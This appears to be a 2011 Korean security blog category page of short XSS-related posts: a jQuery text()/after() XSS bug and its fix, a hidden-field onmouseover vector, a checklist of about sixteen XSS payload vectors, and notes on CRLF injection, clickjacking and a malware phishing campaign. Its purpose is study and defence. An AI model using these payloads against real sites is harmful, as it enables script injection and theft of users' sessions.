'위험한_친구들/십자군_XSS'에 해당되는 글 17건

  1. 2011.10.18 Cross-Site Scripting vulnerability with JavaScript and JQuery by bitfox
  2. 2011.10.11 XSS: Cross-site Scripting by bitfox
  3. 2011.10.11 XSS in hidden field by bitfox
  4. 2011.09.28 CRLF Injection by bitfox
  5. 2011.09.22 Clickjacking for Shells by bitfox
  6. 2011.09.21 XSS in Skype for iOS by bitfox
  7. 2011.09.15 Cookiejacking by bitfox
  8. 2011.09.14 홍커쪽 XSS 체크리스트 by bitfox
  9. 2011.09.05 Fake Facebook friend request email leads to malware by bitfox
  10. 2011.08.31 XSSed project by bitfox

Cross-Site Scripting vulnerability with JavaScript and JQuery

Think you’ve protected your site against Cross-Site scripting attacks by escaping all the content that you’ve rendered? Thought about your javascript?

Here’s a neat bug that got us today. This example is contrived to show a point.

<!DOCTYPE html> 
<html> 
<head> 
  <meta charset="utf-8"> 
  <title>XSS Example</title> 
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script
  <script> 
    $(function() {  
      $('#users').each(function() {  
        var select = $(this);  
        var option = select.children('option').first();  
        select.after(option.text());  
        select.hide();  
      });  
    });  
  </script> 
</head> 
<body> 
  <form method="post"> 
    <p> 
      <select id="users" name="users"> 
        <option value="bad">&lt;script&gt;alert(&#x27;xss&#x27;);&lt;/script&gt;</option> 
      </select> 
    </p> 
  </form> 
</body> 
</html> 
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>XSS Example</title>
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="bad">&lt;script&gt;alert(&#x27;xss&#x27;);&lt;/script&gt;</option>
      </select>
    </p>
  </form>
</body>
</html>

See the problem? Don’t worry, neither did the pair that worked on the javascript. But our QA showed us a neat little alert box!

It looks like the JQuery text() method returns the unescaped payload of the option, and the after() method then creates a nice little script tag. Nasty stuff.

How did we deal with the problem? This was our immediate fix:

// after() accepts a DOM element so lets create a text node  
select.after(document.createTextNode(option.text())); 

Longer term fix – still open to suggestions.

[출처] watchitlater.com


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS: Cross-site Scripting  (0) 2011.10.11
XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox
l
[XSS: Cross-site Scripting]
여러 문서들이 많이 있지만 Persistent(stored)와 Non-Persistent 공격 패턴 및 개념을 인지하는데
명확히 도움을 줄 수 있는 문서이다.



[출처] www.itu.dk


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cross-Site Scripting vulnerability with JavaScript and JQuery  (0) 2011.10.18
XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox
l
type에 hidden 속성을 갖고 있으며 <, > 태그를 필터링하고 있을 경우.

<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />

IE6, 7, 8 혹은 FireFox

Good Luck~ :-)

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cross-Site Scripting vulnerability with JavaScript and JQuery  (0) 2011.10.18
XSS: Cross-site Scripting  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox
l
간만에 오래된 기억의 공격을 떠올렸다. --;
기억력이 벌써 떨어지는 건지.. 최신 유행에만 따라가다 보니 옛것(?)을 잊어버리는 경우가 있다.쩝;;

HTTP 헤더를 이용한 공격인데 일본 사이트에서 진단할때는 많이 진단했었다. 가끔 문제점이 나올 경우가 있었다.하지만 국내 진단에선 쿠키삽입 혹은 Mass Sqlinjection 정도로 신경쓰고 있다.

CRLF는 HTTP 헤더안에 공격 구문을 입력하여 자신이 원하는 값으로 유도하는 공격이다.
자세한건 문건을 보고 확인하자



 



 



[참고 사이트] http://xss.cx/examples/dork/http-injection/http-header-injection-set-cookie-example-poc.html

[출처 및 다운로드] hackingspririts  

[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS: Cross-site Scripting  (0) 2011.10.11
XSS in hidden field  (0) 2011.10.11
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
Posted by bitfox
l

OWASP 뉴질랜드 챕터에서 발간한  Clickjacking 관련 문서이다.
해킹에 관련하여 국내보단 해외가 더 자유롭게(?) 배포할 수 있어서 그런지는 몰라도 더 
상세히 기술되어 이해하기 용이하다.
국내에서는 잡혀갈지 모른다는 두려움이..-0-;; 쩝

 


[출처] Exploit-DB


[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Posted by bitfox
l

Skype가 아이폰 또는 아이팟의 iOS 운영체제에서 xss를 통해 Address book db를 탈취하는 시연장면이 동영상으로 공개되었습니다.


전 빨리 아이폰 그리고 맥북으로 갈아타고 싶은 마음뿐 +0+;;

[출처] 유튜브 http://www.youtube.com/watch?v=Ou_Iir2SklI&feature=player_embedded 


[Notice: 본 글에 대하여 학습 및 보안 강화를 위해 참고하시고, 만약 악의적인 사용시 사용자 본인의 책임을 명시합니다.]

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Fake Facebook friend request email leads to malware  (0) 2011.09.05
Posted by bitfox
l
IE 모든 버젼에서 나왔던 0-Day를 이용한 쿠키잭킹 방식이다.

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

 


관련 동영상

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
홍커쪽 XSS 체크리스트  (0) 2011.09.14
Fake Facebook friend request email leads to malware  (0) 2011.09.05
XSSed project  (0) 2011.08.31
Posted by bitfox
l

<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<script SRC="javascript:alert('xss11');"></script>
<video SRC="javascript:alert('xss12');"</video>
<LAYER SRC="javascript:alert('xss13')"></LAYER>
<embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed>
<applet src="javascript:alert('xss15')" type=text/html>

[출처] 불분명..


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS in Skype for iOS  (0) 2011.09.21
Cookiejacking  (0) 2011.09.15
Fake Facebook friend request email leads to malware  (0) 2011.09.05
XSSed project  (0) 2011.08.31
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
Posted by bitfox
l
최근 나의 구글 멜로 Face북에 친구 요청 메일이 많아 졌다. (참고로 전 페북은 활동이 저조합니다.--;)
이런 메일을 통한 악성 malware를 배포하는 공격이 빈번하다고 한다.



이 메일을 클릭하면 숨겨진 iframe으로 악성 파일을 받아 당신의 컴퓨터를 좀비 피씨로 만들 수 있다.
내용은 아래와 같다.


Fake Facebook friend request, now with hidden iFrame
A slight variation of last week's Facebook friend request spam email campaign has been spotted targeting the social network's users, and this one employs a two-pronged method of attack.

The email mimics Facebook's legitimate friend request message, but there are a few details that might tip off the recipient off to the real nature of the email: the picture of the person who wants to be friends with the user is not included, and the recipient's email address is omitted from the text in the bottom of the email.

But, let's say that the recipient has been fooled, and he clicks on the "Confirm friend request" button. As in the previous scam, he is taken to a fake Facebook page saying that his version of Macromedia Flash Player is too old to continue, and offering a link for downloading the latest version of the player.

But that's not all - the page now also includes a hidden iFrame that loads data from a remote server hosting the Blackhole Exploit Kit, say M86 Security researchers.


The exploit kit tries to take advantage of Java vulnerabilities in the recipient's system and if it succeeds, it downloads what seems to be a variant of the Zeus banking Trojan.




[출처]http://www.net-security.org/malware_news.php?id=1820

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cookiejacking  (0) 2011.09.15
홍커쪽 XSS 체크리스트  (0) 2011.09.14
XSSed project  (0) 2011.08.31
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Posted by bitfox
l
XSS에 대한 취약점에 대해 상세히 설명하고 있으며 프로젝트로 XSS에 취약한 사이트를 공개하는
정보 사이트

The XSSed project was created in early February 2007 by KF and DP. It  provides information on all things related to cross-site scripting vulnerabilities and is the largest online archive of XSS vulnerable websites.

We started this project with the scope of increasing security and privacy on the web. Professional and amateur webmasters and web developers are notified about any cross-site scripting vulnerability affecting their online properties. The importance of securing their web applications is emphasized through the informational and educational content which we provide.

What we do is to simply validate all the submitted XSS vulnerable websites and then publish them on the archive. We actively assist all website owners to remediate the cross-site scripting issues by bringing them up to their attention on a timely manner. You will be helped by us for any problems you may face when trying to correct the XSS flaws



http://xssed.org/archive
Posted by bitfox
l